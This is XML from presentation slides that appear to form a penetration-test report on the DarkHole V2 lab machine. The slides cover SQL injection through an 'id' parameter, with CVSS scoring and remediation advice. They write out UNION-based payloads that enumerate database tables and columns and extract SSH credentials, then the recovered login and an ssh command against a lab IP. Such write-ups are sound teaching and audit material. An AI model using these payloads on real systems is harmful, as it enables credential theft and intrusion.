            <a:ext cx="4074159" cy="714552"/>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03F1E4E9-9E2C-27B3-4353-89C136541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3039" y="1326691"/>
            <a:ext cx="4074159" cy="2072640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BCB3B2-A7EB-8899-845D-005342CDA1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3040" y="3824541"/>
            <a:ext cx="4074159" cy="2180019"/>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2198953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F67F4-5A37-B113-4963-8AC130A280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942327-28FD-4CE1-D546-C5618D52E0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Credential Disclosure from ssh Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C639B771-BA6F-C9E2-561F-AA53FD5C63FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SSH Credential Disclosure via SQL Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>DarkHole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> V2 application's SQL injection vulnerability allowed extraction of plaintext SSH credentials stored in the ssh database table. Retrieved credentials (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) through UNION-based SQLi, leading to unauthorized SSH access and system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: Vulnerable URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.139.143/dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>‘id’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Critical- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>Allows unauthenticated attackers (AV:N) to trivially (AC:L) extract plaintext SSH credentials via SQLi, leading to full system compromise (C:H/I:H/A:H) without user interaction (UI:N) or special privileges (PR:N).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>SSH Compromise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Direct access to server via stolen credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Lateral Movement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Enabled privilege escalation to root via misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Full System Takeover: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Credentials facilitated RCE and flag capture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Eliminate Plaintext Storage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Hash passwords using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> (never store plaintext).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Database Segmentation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Isolate credential storage from web-accessible databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Least Privilege: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Restrict DB user permissions: REVOKE SELECT ON ssh FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>web_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4073332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AB147-2A81-4816-1135-5BCA3B420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E76531-0DE6-4315-45CC-BA1E63E74B86}"/>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400C1E70-729E-A7F9-3881-DA1763B19AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="6957392" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 9.8 (Critical)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A01_2021-Broken_Access_Control/</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>=1' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Result: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retrieved credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>    Username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>jehad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>fool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Identified SQL injection vulnerability via id parameter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Enumerated schema and discovered ssh table and Extracted column names (user, pass). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Retrieved valid SSH credentials and Used credentials to authenticate via SSH. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Established SSH tunnel and used command injection to get reverse shell and Escalated privileges and accessed sensitive files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC93BCF-F48E-389D-B5BA-03F28CF28F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5810" y="521179"/>
            <a:ext cx="4434095" cy="2421717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1EE0D7-60E1-0868-31FB-3882FBC819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15808" y="3429000"/>
            <a:ext cx="4434095" cy="2421717"/>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3734212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47429-CBB2-C97A-57B9-0778233499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06AF6A-3787-30E9-9F11-55F5649980AB}"/>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5B7F7124-988B-1461-D8BB-8CC5E254D72C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="7026966" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Access URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>http://192.168.139.143/index.php?id=NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Inject payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>='darkhole_2’-- -(Discover ssh table.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Inject payload to get column names: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>='ssh'-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Extract user credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>id=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>SSH into target machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>ssh jehad@192.168.139.143 # password: fool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized SSH access using stolen credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gained remote command execution via port forwarding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full control over target machine including reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Potential to further escalate privileges and compromise the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9092CE77-572C-C687-0A37-616C20DA1C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1468" y="538502"/>
            <a:ext cx="4054213" cy="2383374"/>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1D8989FE-AE2B-45D0-CF3B-880D6694E7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1468" y="3482231"/>
            <a:ext cx="4054213" cy="2502415"/>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560543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D87F3-A45C-F0FF-FAE2-58A73B581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AD9BD2-FE29-1E7E-A43A-A065AAABA5F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>SSH Login via Reused Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF5948B8-1F54-92B4-ED1A-28A592CF1438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>SSH Authentication with Reused Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The compromised SSH credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>extracted via SQL injection were reused for SSH access to the target server. This credential reuse allowed to bypass authentication mechanisms and gain unauthorized shell access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Not directly URL-based. Access via SSH using previously exposed credentials from SQL-injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1"/>
              <a:t>index.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Credentials were extracted via SQL injection and then reused for SSH access, allowing remote system login over the network. This led to full system compromise including reverse shell access and privilege escalation with low attack complexity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Risk / Impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Unauthorized Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>: Direct shell access to server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Enabled path to root via misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
